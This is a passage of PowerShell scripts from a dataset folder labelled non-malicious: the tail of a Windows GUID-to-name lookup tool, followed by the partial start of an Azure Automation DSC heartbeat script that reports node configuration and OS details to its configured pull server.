"0907616E-F5E6-48D8-9D61-A91C3D28106D" = "Hyper-V Remote File Browsing" "BCB5256F-79F6-4CEE-B725-DC34E402FD46" = "ImplicitAppShortcuts" "87D66A43-7B11-4A28-9811-C86EE395ACF7" = "Indexing Options" "A0275511-0E86-4ECA-97C2-ECD8F1221D08" = "Infrared" "15EAE92E-F17A-4431-9F28-805E482DAFD4" = "Install New Programs" "A305CE99-F527-492B-8B1A-7E76FA98D6E4" = "Installed updates" "D450A8A1-9568-45C7-9C0E-B4F9FB4537BD" = "Installed Updates" "2559A1F4-21D7-11D4-BDAF-00C04F60B9F0" = "Internet" "871C5380-42A0-1069-A2EA-08002B30309D" = "Internet Explorer (Homepage)" "11016101-E366-4D22-BC06-4ADA335C892B" = "Internet Explorer History and Feeds Shell Data Source for Windows Search" "9A096BB5-9DC3-4D1C-8526-C3CBF991EA4E" = "Internet Explorer RSS Feeds Folder" "A304259D-52B8-4526-8B1A-A1D6CECC8243" = "iSCSI Initiator" "725BE8F7-668E-4C7B-8F90-46BDB0936430" = "Keyboard" "BF782CC9-5A52-4A17-806C-2A894FFEEAC5" = "Language Settings" "328B0346-7EAF-4BBE-A479-7CB88A095F5B" = "Layout Folder" "A302545D-DEFF-464B-ABE8-61C8648D939B" = "Libraries" "48DAF80B-E6CF-4F4E-B800-0E69D84EE384" = "Libraries" "1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE" = "Libraries" "896664F7-12E1-490F-8782-C0835AFD98FC" = "Libraries delegate folder that appears in Users Files Folder" "A5A3563A-5755-4A6F-854E-AFA3230B199F" = "Library Folder" "BFB9D5E0-C6A9-404C-B2B2-AE6DB6AF4968" = "Links" "F1B32785-6FBA-4FCF-9D55-7B8E7F157091" = "Local" "A520A1A4-1780-4FF6-BD18-167343C5AF16" = "LocalLow" "267CF8A9-F4E3-41E6-95B1-AF881BE130FF" = "Location Folder" "1FA9085F-25A2-489B-85D4-86326EEDCD87" = "Manage Wireless Networks" "89D83576-6BD1-4C86-9454-BEB04E94C819" = "MAPI Folder" "BC476F4C-D9D7-4100-8D4E-E043F6DEC409" = "Microsoft Browser Architecture" "A5E46E3A-8849-11D1-9D8C-00C04FC99D61" = "Microsoft Browser Architecture" "63DA6EC0-2E98-11CF-8D82-444553540000" = "Microsoft FTP Folder" "98EC0E18-2098-4D44-8644-66979315A281" = "Microsoft Office Outlook" "BD84B380-8CA2-1069-AB1D-08000948F534" = "Microsoft Windows Font Folder" "87630419-6216-4FF8-A1F0-143562D16D5C" = "Mobile Broadband Profile Settings Editor" "5EA4F148-308C-46D7-98A9-49041B1DD468" = "Mobility Center Control Panel" "6C8EEC18-8D75-41B2-A177-8831D59D2D50" = "Mouse" "4BD8D571-6D19-48D3-BE97-422220080E43" = "Music" "1CF1260C-4DD0-4EBB-811F-33C572699FDE" = "Music" "2112AB0A-C86A-4FFE-A368-0DE96E47012E" = "Music" "94D6DDCC-4A68-4175-A374-BD584A510B78" = "Music" "3F2A72A7-99FA-4DDB-A5A8-C604EDF61D6B" = "Music Library" "978E0ED7-92D6-4CEC-9B59-3135B9C49CCF" = "Music library" "71689AC1-CC88-45D0-8A22-2943C3E7DFB3" = "Music Search Results" "20D04FE0-3AEA-1069-A2D8-08002B30309D" = "My Computer" "450D8FBA-AD25-11D0-98A8-0800361B1103" = "My Documents" "ED228FDF-9EA8-4870-83B1-96B02CFE0D52" = "My Games" "208D2C60-3AEA-1069-A2D7-08002B30309D" = "My Network Places" "FC9FB64A-1EB2-4CCF-AF5E-1A497A9B5C2D" = "My sharing folders" "D20BEEC4-5CA8-4905-AE3B-BF251EA09B53" = "Network" "8E908FC9-BECC-40F6-915B-F4CA0E70D03D" = "Network and Sharing Center" "7007ACC7-3202-11D1-AAD2-00805FC1270E" = "Network Connections" "992CFFA0-F557-101A-88EC-00DD010CCC48" = "Network Connections" "6F0CD92B-2E97-45D1-88FF-B0D186B8DEDD" = "Network Connections" "E7DE9B1A-7533-4556-9484-B26FB486475E" = "Network Map" "46137B78-0EC3-426D-8B89-FF7C3A458B5E" = "Network Neighborhood" "2728520D-1EC8-4C68-A551-316B684C4EA7" = "Network Setup Wizard" "C5ABBF53-E17F-4121-8900-86626FC2C973" = "Network Shortcuts" "2A00375E-224C-49DE-B8D1-440DF7EF3DDC" = "None" "2559A1F6-21D7-11D4-BDAF-00C04F60B9F0" = "OEM link" "C1BAE2D0-10DF-4334-BEDD-7AA20B227A9D" = "OEM Links" "EE32E446-31CA-4ABA-814F-A5EBD2FD6D5E" = "Offline Files" "D24F75AA-4F2B-4D07-A3C4-469B3D9030C4" = "Offline Files" "AFDB1F70-2A4C-11D2-9039-00C04F8EEB3E" = "Offline Files Folder" "A52BBA46-E9E1-435F-B3D9-28DAA648C0F6" = "OneDrive" "8E74D236-7F35-4720-B138-1FED0B85EA75" = "OneDrive" "018D5C66-4533-4307-9B53-224DE2ED1FE6" = "OneDrive" "5FA947B5-650A-4374-8A9A-5EFA4F126834" = "OpenDrive" "2C36C0AA-5812-4B87-BFD0-4CD0DFB19B39" = "Original Images" "B4FB3F98-C1EA-428D-A78A-D1F5659CBA93" = "Other Users Folder" "6785BFAC-9D2D-4BE5-B7E2-59937E8FB80A" = "Other Users Folder" "96AE8D84-A250-4520-95A5-A47A7E3C548B" = "Parental Controls" "5224F545-A443-4859-BA23-7B5A95BDC8EF" = "People Near Me" "78F3955E-3B90-4184-BD14-5397C15F1EFC" = "Performance Information and Tools" "ED834ED6-4B5A-4BFE-8F11-A626DCB6A921" = "Personalization Control Panel" "40419485-C444-4567-851A-2DD7BFA1684D" = "Phone and Modem" "F0D63F85-37EC-4097-B30D-61B4A8917118" = "Photo Stream" "3ADD1653-EB32-4CB0-BBD7-DFA0ABB5ACCA" = "Pictures" "339719B5-8C47-4894-94C2-D8F77ADD44A6" = "Pictures" "A990AE9F-A03B-4E80-94BC-9912D7504104" = "Pictures" "33E28130-4E1E-4676-835A-98395C3BC3BB" = "Pictures" "B3690E58-E961-423B-B687-386EBFD83239" = "Pictures folder" "C1F8339F-F312-4C97-B1C6-ECDF5910C5C0" = "Pictures library" "0B2BAAEB-0042-4DCA-AA4D-3EE8648D03E5" = "Pictures Library" "4DCAFE13-E6A7-4C28-BE02-CA8C2126280D" = "Pictures Search Results" "DE92C1C7-837F-4F69-A3BB-86E631204A23" = "Playlists" "0C15D503-D017-47CE-9016-7B3F978721CC" = "Portable Device Values" "35786D3C-B075-49B9-88DD-029876E11C01" = "Portable Devices" "640167B4-59B0-47A6-B335-A6B3C0695AEA" = "Portable Media Devices" "025A5937-A6BE-4686-A844-36FE4BEC8B6D" = "Power Options" "9DB7A13C-F208-4981-8353-73CC61AE2783" = "Previous Versions" "1723D66A-7A12-443E-88C7-05E1BFE79983" = "Previous Versions Delegate Folder" "A3C3D402-E56C-4033-95F7-4885E80B0111" = "Previous Versions Results Delegate Folder" "F8C2AB3B-17BC-41DA-9758-339D7DBF2D88" = "Previous Versions Results Folder" "9274BD8D-CFD1-41C3-B35E-B13F55A758F4" = "Printer Shortcuts" "2227A280-3AEA-1069-A2DE-08002B30309D" = "Printers" "76FC4E2D-D6AD-4519-A663-37BD56068185" = "Printers" "ED50FC29-B964-48A9-AFB3-15EBB9B97F36" = "PrintHood delegate folder" "FCFEECAE-EE1B-4849-AE50-685DCF7717EC" = "Problem Reports and Solutions" "7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E" = "Program Files" "6D809377-6AF0-444B-8957-A3773F02200E" = "Program Files" "905E63B6-C1BF-494E-B29C-65B732D3D21A" = "Program Files" "62AB5D82-FDC1-4DC3-A9DD-070D1D495D97" = "ProgramData" "0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8" = "Programs" "5CD7AEE2-2219-4A67-B85D-6C9CE15660CB" = "Programs" "A77F5D77-2E2B-44C3-A6A2-ABA601054A51" = "Programs" "BCBD3057-CA5C-4622-B42D-BC56DB0AE516" = "Programs" "DF7266AC-9274-4867-8D55-3BD661DE872D" = "Programs and Features" "7B81BE6A-CE2B-4676-A29E-EB907A5126C5" = "Programs and Features" "7BE9D83C-A729-4D97-B5A7-1B7313C39E0A" = "Programs Folder" "865E5E76-AD83-4DCA-A109-50DC2113CE9A" = "Programs Folder and Fast Items" "8060B2E3-C9D7-4A5D-8C6B-CE8EBA111328" = "Proximity CPL" "DFDF76A2-C82A-4D63-906A-5644AC457385" = "Public" "0482AF6C-08F1-4C34-8C90-E17EC98B1E17" = "Public Account Pictures" "C4AA340D-F20F-4863-AFEF-F87EF2E6BA25" = "Public Desktop" "ED4824AF-DCE4-45A8-81E2-FC7965083634" = "Public Documents" "3D644C9B-1FB8-4F30-9B45-F670235F79C0" = "Public Downloads" "3214FAB5-9757-4298-BB61-92A9DEAA44FF" = "Public Music" "B6EBFB86-6907-413C-9AF7-4FC2ABF07CC5" = "Public Pictures" "2400183A-6185-49FB-A2D8-4A392A602BA3" = "Public Videos" "52A4F021-7B75-48A9-9F6B-4B87A210BC8F" = "Quick Launch" "5E8FC967-829A-475C-93EA-51FCE6D9FFCE" = "RealPlayer Cloud" "0C39A5CF-1A7A-40C8-BA74-8900E6DF5FCD" = "Recent Items" "AE50C081-EBD2-438A-8655-8A092E34987A" = "Recent Items" "4564B25E-30CD-4787-82BA-39E73A750B14" = "Recent Items Instance Folder" "22877A6D-37A1-461A-91B0-DBDA5AAEBC99" = "Recent Places" "1A6FDBA2-F42D-4358-A798-B74D745926C5" = "Recorded TV" "B7534046-3ECB-4C18-BE4E-64CD4CB7D6AC" = "Recycle Bin" "645FF040-5081-101B-9F08-00AA002F954E" = "Recycle bin" "62D8ED13-C9D0-4CE8-A914-47DD628FB1B0" = "Regional and Language Options" "863AA9FD-42DF-457B-8E4D-0DE1B8015C60" = "Remote Printers" "A6482830-08EB-41E2-84C1-73920C2BADB9" = "Removable Storage Devices" "8AD10C31-2ADB-4296-A8F7-E4701232C972" = "Resources" "2965E715-EB66-4719-B53F-1672673BBEFA" = "Results Folder" "E555AB60-153B-4D17-9F04-A5FE99FC15EC" = "Ringtones" "C870044B-F49E-4126-A9C3-B52A1FF411E8" = "Ringtones" "AAA8D5A5-F1D6-4259-BAA8-78E7EF60835E" = "RoamedTileImages" "3EB685DB-65F9-4CF6-A03A-E3EF65729F3D" = "Roaming" "00BCFC5A-ED94-4E48-96A1-3F6217F21990" = "RoamingTiles" "2559A1F3-21D7-11D4-BDAF-00C04F60B9F0" = "Run..." "B250C668-F57D-4EE1-A63C-290EE7D1AA1F" = "Sample Music" "C4900540-2379-4C75-844B-64E6FAF8716B" = "Sample Pictures" "15CA69B3-30EE-49C1-ACE1-6B5EC372AFB5" = "Sample Playlists" "859EAD94-2E85-48AD-A71A-0969CB56A6CD" = "Sample Videos" "4336A54D-038B-4685-AB02-99BB52D3FB8B" = "Samples" "4C5C32FF-BB9D-43B0-B5B4-2D72E54EAAA4" = "Saved Games" "FB0C9C8A-6C50-11D1-9F1D-0000F8757FCD" = "Scanners & Cameras" "00F2886F-CD64-4FC9-8EC5-30EF6CDBE8C3" = "Scanners and Cameras" "E211B736-43FD-11D1-9EFB-0000F8757FCD" = "Scanners and Cameras" "D6277990-4C6A-11CF-8D87-00AA0060F5BF" = "Scheduled Tasks" "B7BEDE81-DF94-4682-A7D8-57A52620B86F" = "Screenshots" "2559A1F0-21D7-11D4-BDAF-00C04F60B9F0" = "Search" "72B36E70-8700-42D6-A7F7-C9AB3323EE51" = "Search Connector Folder" "04731B67-D933-450A-90E6-4ACD2E9408FE" = "Search Folder" "9343812E-1C37-4A49-A12E-4B2D810D956B" = "Search Home" "190337D1-B8CA-4121-A639-6D472D16972A" = "Search Results" "1F4DE370-D627-11D1-BA4F-00A0C91EEDBA" = "Search Results - Computers (Computer Search Results Folder, Network Computers)" "E17D4FC0-5564-11D1-83F2-00A0C90DC849" = "Search Results Folder" "7D1D3A04-DEBB-4115-95CF-2F29DA2920DA" = "Searches" "D9EF8727-CAC2-4E60-809E-86F80A666C91" = "Secure Startup (BitLocker Drive Encryption)" "9F433B7C-5F96-4CE1-AC28-AEAA1CC04D7C" = "Security Center" "8983036C-27C0-404B-8F08-102D10DCFD74" = "SendTo" "E9950154-C418-419E-A90A-20C5287AE24B" = "Sensors" "96437431-5A90-4658-A77C-25478734F03E" = "Server Manager" "2559A1F7-21D7-11D4-BDAF-00C04F60B9F0" = "Set Program Access and Defaults" "59031A47-3F72-44A7-89C5-5595FE6B30EE" = "Shared Documents Folder (Users Files)" "E7E4BC40-E76A-11CE-A9BB-00AA004AE837" = "Shell DocObject Viewer" "1A9BA3A0-143A-11CF-8350-444553540000" = "Shell Favorite Folder" "E773F1AF-3A65-4866-857D-846FC9C4598A" = "Shell Storage Folder Viewer" "3080F90D-D7AD-11D9-BD98-0000947B0257" = "Show Desktop" "AB4F43CA-ADCD-4384-B9AF-3CECEA7D6544" = "Sitios Web" "69D2CF90-FC33-4FB7-9A0C-EBB0F0FCB43C" = "Slide Shows" "D5B1944E-DB4E-482E-B3F1-DB05827F0978" = "Softex OmniPass Encrypted Folder" "A5110426-177D-4E08-AB3F-785F10B4439C" = "Sony Ericsson File Manager" "F82DF8F7-8B9F-442E-A48C-818EA735FF9B" = "Sound" "58E3C745-D971-4081-9034-86E34B30836A" = "Speech Recognition Options" "625B53C3-AB48-4EC1-BA1F-A1EF4146FC19" = "Start Menu" "A4115719-D62E-491D-AA7C-E74B8BE3B067" = "Start Menu" "A00EE528-EBD9-48B8-944A-8942113D46AC" = "Start Menu Commanding Provider Folder" "48E7CAAB-B918-4E58-A94D-505519C795DC" = "Start Menu Folder" "98F275B4-4FFF-11E0-89E2-7B86DFD72085" = "Start Menu Launcher Provider Folder" "E345F35F-9397-435C-8F95-4E922C26259E" = "Start Menu Path Complete Provider Folder" "DAF95313-E44D-46AF-BE1B-CBACEA2C3065" = "Start Menu Provider Folder" "82A5EA35-D9CD-47C5-9629-E15D2F714E6E" = "Startup" "B97D20BB-F46A-4C97-BA10-5E3608430854" = "Startup" "F3F5824C-AD58-4728-AF59-A1EBE3392799" = "Sticky Notes Namespace Extension for Windows Desktop Search" "F942C606-0914-47AB-BE56-1321B8035096" = "Storage Spaces" "EDC978D6-4D53-4B2F-A265-5805674BE568" = "Stream Backed Folder" "F5175861-2688-11D0-9C5E-00AA00A45957" = "Subscription Folder" "43668BF8-C14E-49B2-97C9-747784D784B7" = "Sync Center" "E413D040-6788-4C22-957E-175D1C513A34" = "Sync Center Conflict Delegate Folder" "289978AC-A101-4341-A817-21EBA7FD046D" = "Sync Center Conflict Folder" "9C73F5E5-7AE7-4E32-A8E8-8D23B85255BF" = "Sync Center Folder" "289A9A43-BE44-4057-A41B-587A76D7E7F9" = "Sync Results" "BC48B32F-5910-47F5-8570-5074A8A5636A" = "Sync Results Delegate Folder" "71D99464-3B6B-475C-B241-E15883207529" = "Sync Results Folder" "0F214138-B1D3-4A90-BBA9-27CBC0C5389A" = "Sync Setup" "F1390A9A-A3F4-4E5D-9C5F-98F3BD8D935C" = "Sync Setup Delegate Folder" "2E9E59C0-B437-4981-A647-9C34B9B90891" = "Sync Setup Folder" "BB06C0E4-D293-4F75-8A90-CB05B6477EEE" = "System" "9FE63AFD-59CF-4419-9775-ABCC3849F861" = "System Recovery" "3F6BC534-DFA1-4AB4-AE54-EF25A74E0107" = "System Restore" "D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27" = "System32" "1AC14E77-02E7-4E5D-B744-2EB1AE5198B7" = "System32" "80F3F1D5-FECA-45F3-BC32-752C152E456E" = "Tablet PC Settings" "05D7B0F4-2121-4EFF-BF6B-ED3F69B894D9" = "Taskbar (NotificationAreaIcons)" "0DF44EAA-FF21-4412-828E-260A8728E7F1" = "Taskbar and StartMenu" "7E636BFE-DFA9-4D5E-B456-D7B39851D8A9" = "Templates" "A63293E8-664E-48DB-A079-DF759E0509F7" = "Templates" "B94237E7-57AC-4347-9151-B08C6C32D1F7" = "Templates" "9E52AB10-F80D-49DF-ACB8-4330F5687855" = "Temporary Burn Folder" "7BD29E00-76C1-11CF-9DD0-00A0C9034933" = "Temporary Internet Files" "7BD29E01-76C1-11CF-9DD0-00A0C9034933" = "Temporary Internet Files" "352481E8-33BE-4251-BA85-6007CAEDCF9D" = "Temporary Internet Files" "D17D1D6D-CC3F-4815-8FE3-607E7D5D10B3" = "Text to Speech" "4D9F7874-4E0C-4904-967B-40B0D20C3E4B" = "The Internet" "F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F" = "The user's full name" "9B74B6A3-0DFD-4F11-9E78-5F7800F2E772" = "The user's username (%USERNAME%)" "5E6C858F-0E22-4760-9AFE-EA3317B67173" = "The user's username (%USERNAME%)" "5B934B42-522B-4C34-BBFE-37A3EF7B9C90" = "This Device Folder" "82BA0782-5B7A-4569-B5D7-EC83085F08CC" = "TopViews" "BDBE736F-34F5-4829-ABE8-B550E65146C4" = "TopViews" "45C6AFA5-2C13-402F-BC5D-45CC8172EF6B" = "Toshiba Bluetooth Stack" "708E1662-B832-42A8-BBE1-0A77121E3908" = "Tree property value folder" "C58C4893-3BE0-4B45-ABB5-A63E4B8C8651" = "Troubleshooting" "C291A080-B400-4E34-AE3F-3D2B9637D56C" = "UNCFAT IShellFolder Class" "60632754-C523-4B62-B45C-4172DA012619" = "User Accounts" "7A9D77BD-5403-11D2-8785-2E0420524153" = "User Accounts (Users and Passwords)" "031E4825-7B94-4DC3-B131-E946B44C8DD5" = "User Libraries" "9E3995AB-1F9C-4F13-B827-48B24B6C7174" = "User Pinned" "1F3427C8-5C10-4210-AA03-2EE45287D668" = "User Pinned" "0762D272-C50A-4BB0-A382-697DCD729B80" = "Users" "C4D98F09-6124-4FE0-9942-826416082DA9" = "Users libraries" "18989B1D-99B5-455B-841C-AB7C74E4DDFC" = "Videos" "491E922F-5643-4AF4-A7EB-4E7A138D8174" = "Videos" "A0953C92-50DC-43BF-BE83-3742FED03C9C" = "Videos" "5FA96407-7E77-483C-AC93-691D05850DE8" = "Videos folder" "292108BE-88AB-4F33-9A26-7748E62E37AD" = "Videos library" "631958A6-AD0F-4035-A745-28AC066DC6ED" = "Videos Library" "EA25FBD7-3BF7-409E-B97F-3352240903F4" = "Videos Search Results" "B5947D7F-B489-4FDE-9E77-23780CC610D1" = "Virtual Machines" "BDEADF00-C265-11D0-BCED-00A0C90AB50F" = "Web Folders" "B28AA736-876B-46DA-B3A8-84C5E30BA492" = "Web sites" "CB1B7F8C-C50A-4176-B604-9E24DEE8D4D1" = "Welcome Center" "3080F90E-D7AD-11D9-BD98-0000947B0257" = "Window Switcher" "F38BF404-1D43-42F2-9305-67DE0B28FC23" = "Windows" "BE122A0E-4503-11DA-8BDE-F66BAD1E3F3A" = "Windows Anytime Upgrade" "78CB147A-98EA-4AA6-B0DF-C8681F69341C" = "Windows CardSpace" "D8559EB9-20C0-410E-BEDA-7ED416AECC2A" = "Windows Defender" "13E7F612-F261-4391-BEA2-39DF4F3FA311" = "Windows Desktop Search" "1F43A58C-EA28-43E6-9EC4-34574A16EBB7" = "Windows Desktop Search MAPI Namespace Extension Class" "67718415-C450-4F3C-BF8A-B487642DC39B" = "Windows Features" "4026492F-2F69-46B8-B9BF-5654FC07E423" = "Windows Firewall" "3E7EFB4C-FAF1-453D-89EB-56026875EF90" = "Windows Marketplace" "98D99750-0B8A-4C59-9151-589053683D73" = "Windows Search Service Media Center Namespace Extension Handler" "D426CFD0-87FC-4906-98D9-A23F5D515D61" = "Windows Search Service Outlook Express Protocol Handler" "2559A1F2-21D7-11D4-BDAF-00C04F60B9F0" = "Windows Security" "087DA31B-0DD3-4537-8E23-64A18591F88B" = "Windows Security Center" "E95A4861-D57A-4BE1-AD0F-35267E261739" = "Windows Side Show" "36EEF7DB-88AD-4E81-AD49-0E313F0C35F8" = "Windows Update" "ECDB0924-4208-451E-8EE0-373C0956DE16" = "Work Folders" "241D7C96-F8BF-4F85-B01F-E2B043341A4B" = "Workspaces Center(Remote Application and Desktop Connections)" "27E2E392-A111-48E0-AB0C-E17705A05F85" = "WPD Content Type Folder" } $LogProviderGuidHT = @{} & $env:windir\system32\logman.exe query providers | ForEach-Object { $provider = $_ if ($provider -match "\{") { $LogName, $LogGuid = ($provider -split "{") -replace "}" $LogName = $LogName.Trim() $LogGuid = $LogGuid.Trim() if ($LogProviderGuidHT.ContainsKey($LogGuid)) {} else { $LogProviderGuidHT.Add($LogGuid, $LogName) } } } if (-not ([System.Management.Automation.PSTypeName]'Shell32').Type) { Add-Type -ErrorAction SilentlyContinue @" using System; using System.Runtime.InteropServices; public class shell32 { [DllImport("shell32.dll")] private static extern int SHGetKnownFolderPath( [MarshalAs(UnmanagedType.LPStruct)] Guid rfid, uint dwFlags, IntPtr hToken, out IntPtr pszPath ); public static string GetKnownFolderPath(Guid rfid) { IntPtr pszPath; if (SHGetKnownFolderPath(rfid, 0, IntPtr.Zero, out pszPath) != 0) return ""; // add whatever error handling you fancy string path = Marshal.PtrToStringUni(pszPath); Marshal.FreeCoTaskMem(pszPath); return path; } } "@ } $Obj = "" | Select-Object GUID,Shell32,"Microsoft Documented",LogProvider,"Netsh Show Helper",EricRZimmerman } Process { $Obj.GUID = $GUID $GUID = $GUIDPattern.Match($GUID).value if ($HumanReadableValue = $MSWinGUIDHT[$GUID]) { $Obj."Microsoft Documented" = $HumanReadableValue } else { $Obj."Microsoft Documented" = "Not found." } if ($HumanReadableValue = $NetshShowHelperGUIDHT[$GUID]) { $Obj."Netsh Show Helper" = $HumanReadableValue } else { $Obj."Netsh Show Helper" = "Not found." } if ($HumanReadableValue = $EZGuidHT[$GUID]) { $Obj.EricRZimmerman = $HumanReadableValue } else { $Obj.EricRZimmerman = "Not found." } if ($HumanReadableValue = $LogProviderGuidHT[$GUID]) { $Obj.LogProvider = $HumanReadableValue } else { $Obj.LogProvider = "Not found." } if ($HumanReadableValue = $([Shell32]::GetKnownFolderPath($GUID))) { $Obj.Shell32 = $HumanReadableValue } else { $Obj.Shell32 = "Not found." } $Obj } End {}
combined_dataset/train/non-malicious/sample_61_9.ps1
sample_61_9.ps1
$ErrorActionPreference = 'Stop' <# .Synopsis Returns payload information from glcm. This info is required to send a heart beat request to AA #> function Get-HeartbeatInfo { [CmdletBinding()] param() $glcm = Get-DscLocalConfigurationManager $configurationName = "" $aaServerUrls = New-Object System.Collections.ArrayList if($glcm.ReportManagers) { $serverUrl = $glcm.ReportManagers.ServerURL if($serverUrl -and !($aaServerUrls.Contains($serverUrl))) { $aaServerUrls.Add($serverUrl) > $null } } if($glcm.ResourceModuleManagers) { $serverUrl = $glcm.ResourceModuleManagers.ServerURL if($serverUrl -and !($aaServerUrls.Contains($serverUrl))) { $aaServerUrls.Add($serverUrl) > $null } } if($glcm.ConfigurationDownloadManagers) { $serverUrl = $glcm.ConfigurationDownloadManagers.ServerURL try { #get configuration name if available if($glcm.ConfigurationDownloadManagers.CimClass -and $glcm.ConfigurationDownloadManagers.CimClass.CimClassProperties) { $configurationNamesExists = ($glcm.ConfigurationDownloadManagers.CimClass.CimClassProperties)['ConfigurationNames'] if($configurationNamesExists) { $configurationName = [string]($glcm.ConfigurationDownloadManagers.configurationNames) } } } catch { Write-Verbose "[WARNING] Could not retrieve ConfigurationNames from glcm $_ ..." } if($serverUrl -and !($aaServerUrls.Contains($serverUrl))) { $aaServerUrls.Add($serverUrl) > $null } } $registrationMetaData = @{ NodeConfigurationName = $configurationName ConfigurationMode = $glcm.ConfigurationMode ConfigurationModeFrequencyMins = $glcm.ConfigurationModeFrequencyMins RefreshFrequencyMins = $glcm.RefreshFrequencyMins RebootNodeIfNeeded = $glcm.RebootNodeIfNeeded ActionAfterReboot = $glcm.ActionAfterReboot AllowModuleOverwrite = $glcm.AllowModuleOverWrite } return @{ ServerUrls = $aaServerUrls RegistrationMetaData = $registrationMetaData } } function Test-Command { param ( [String] $Name ) return ($null -ne (Get-Command -Name $Name -ErrorAction Continue 2> $null)) } function GetComputerInfoEditionId { param() $windowsEditionId = $null if(Test-Command -Name Get-ComputerInfo) { $windowsEditionId = Get-ComputerInfo -Property WindowsEditionId -ErrorAction SilentlyContinue } return $windowsEditionId } function GetEditionId { param() $windowsEditionId = $null if(Test-Command -Name Get-ItemPropertyValue) { $windowsEditionId = Get-ItemPropertyValue 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name EditionId } elseif(Test-Command -Name Get-ItemProperty) { if($editionId = Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name EditionId -ErrorAction SilentlyContinue) { $windowsEditionId = $editionId.EditionID } } return $windowsEditionId } <# .synopsis Returns windows edition id For e.g. on Nano Server returns - ServerDatacenterNano on Windows Client - Enterprise #> function Get-WindowsEdition { param() $windowsEditionId = GetEditionId if(!$windowsEditionId) { if($windowsEditionId = GetComputerInfoEditionId) { $windowsEditionId = $windowsEditionId.WindowsEditionId } } return $windowsEditionId } <# .Synopsis Returns OS major minor version #> function GetOSVersion { [CmdletBinding()] param() $majorVersion = "" $minorVersion = "" if(Test-Command -Name Get-CimInstance) { $os = Get-CimInstance Win32_OperatingSystem } else { $os = Get-WmiObject Win32_OperatingSystem } $version = $os.Version if($version) { # On PS/.NET 2.0, [System.Version] doesn't have a Parse method if ($version -match '^(?<major>[0-9]+)\.(?<minor>[0-9]+)(\.[0-9]+)*$') { $majorVersion = [int]::Parse($matches['major']) $minorVersion = [int]::Parse($matches['minor']) } else { Write-Verbose "Invalid OS version: $version ..." } } @{ Major = $majorVersion Minor = $minorVersion } } <# .Synopsis Returns VM UUID #> function Get-VMUUId { [CmdletBinding()] param() $vmuuid = "" $status = "success" try { if(Test-Command -Name Get-CimInstance) { $computerSystemProduct = Get-CimInstance Win32_ComputerSystemProduct } else { $computerSystemProduct = Get-WmiObject Win32_ComputerSystemProduct } if($computerSystemProduct) { $vmuuid = $computerSystemProduct.UUID } Write-Verbose "VMUUId is $vmuuid ..." } catch { Write-Verbose "[WARNING] An error occurred while retrieving VM UUID $_ ..." $status = "error" } return @{ VMUUID = $vmuuid Status = $status } } <# .Synopsis Returns OS profile object #> function Get-OSProfile { [CmdletBinding()] param() $osName = Get-WindowsEdition $osVersion = GetOSVersion return @{ Name = $osName Type = "Windows" MajorVersion = $osVersion["Major"] MinorVersion = $osVersion["Minor"] VMUUID = (Get-VMUUId).VMUUID } } function GetCimClass { [CmdletBinding()] param( [String] $ClassName, [String] $Namespace ) return (Get-CimClass -ClassName MSFT_DSCMetaConfiguration -Namespace root/microsoft/windows/desiredstateconfiguration -ErrorAction Continue) } <# .Synopsis Retrieves DSC agent id. Returns an empty string if agent id is not available #> function Get-DscAgentId { [CmdletBinding()] param() $agentID = "" $status = "success" #AgentID is not available in wmf 4.0. So return blank agent id if the property does not exists try { if($getlcm = GetCimClass) { if($getlcm -and $getlcm.CimClassProperties -and ($getlcm.CimClassProperties)['AgentId']) { $agentID = (Get-DscLocalConfigurationManager).AgentId } } Write-Verbose "AgentID is $agentID ..." } catch { Write-Verbose "[WARNING] An error occurred while retrieving agent ID $_ ..." $status = "error" } return @{ AgentID = $agentID Status = $status } } <# .Synopsis Returns OAAS certificate from the local machine that is used to authenticate with AA pull server #> function Get-OAASCertificate { [CmdletBinding()] param( [Parameter(Mandatory=$true)] [ValidateNotNullOrEmpty()] [string]$ServerUrl ) $subject = 'CN=' + $ServerUrl $certificate = Get-ChildItem Cert:\LocalMachine\My | ? Subject -eq $subject | Select-Object -First 1 if (!$certificate) { throw "Failed to retrieve the OAAS certificate for heartbeat api request [ServerURL]: $ServerUrl ..." } return $certificate } <# .Synopsis Returns OAAS endpoint #> function GetOAASEndpoint { [CmdletBinding()] param( [Parameter(Mandatory=$true)] [ValidateNotNullOrEmpty()] [string] $AgentId, [Parameter(Mandatory=$true)] [ValidateNotNullOrEmpty()] [string] $ServerURL ) return ($ServerURL + "/Nodes(AgentId='" + $AgentId + "')/ExtendedProperties") } function SendWebRequest { [CmdletBinding()] param( [Parameter(Mandatory=$true)] [string] $Uri, [Parameter(Mandatory=$true)] [System.Security.Cryptography.X509Certificates.X509Certificate] $Certificate, [Parameter(Mandatory=$true)] [hashtable] $Payload ) $jsonPayload = ConvertTo-Json $Payload -Depth 10 try { $response = Invoke-WebRequest ` -Uri ([Uri] $Uri) ` -ContentType 'application/json' ` -Method Post ` -Certificate $Certificate ` -Headers @{ "protocolversion" = "2.0" } ` -Body $jsonPayload ` -UseBasicParsing return $response } finally { [System.Net.ServicePointManager]::CertificatePolicy = $null } } <# .Synopsis Invokes AA server heartbeat endpoint to send the heartbeat request #> function Send-HeartbeatRequest { [CmdletBinding()] param( [Parameter(Mandatory=$true)] [ValidateNotNullOrEmpty()] [string] $ServerURL, [Parameter(Mandatory=$true)] [hashtable] $Payload ) $agentId = (Get-DscAgentId)["AgentID"] $accountId = Split-Path -Path $ServerURL -Leaf $certificate = Get-OAASCertificate -ServerUrl $ServerURL $endpoint = GetOAASEndpoint -AgentId $agentId -ServerURL $ServerURL try { $response = SendWebRequest -Uri $endpoint -Certificate $certificate -Payload $Payload Write-Verbose "Heartbeat is sent successfully" return } catch { #No retries when status code is 400,401,403,404 $message = "Invoking heartbeat web request failed for registration url {0}: {1}" -f ($ServerURL, $_.ToString().TrimEnd()) Write-Verbose $message } } <# .Synopsis Send Guest config heartbeat #> function Send-Heartbeat { [CmdletBinding()] param( [Parameter(Mandatory=$true)] [ValidateSet('GCAgentStart')] [string]$Event ) try { Write-Verbose "[INFO] Event $Event" -Verbose if((Get-module PSDesiredStateConfiguration -ListAvailable -Verbose:$false) -eq $null) { Write-Verbose "[ERROR] DSC is not installed ..." Write-Verbose "[ERROR] No heartbeat sent ..." return } # Get dsc local configuration manager 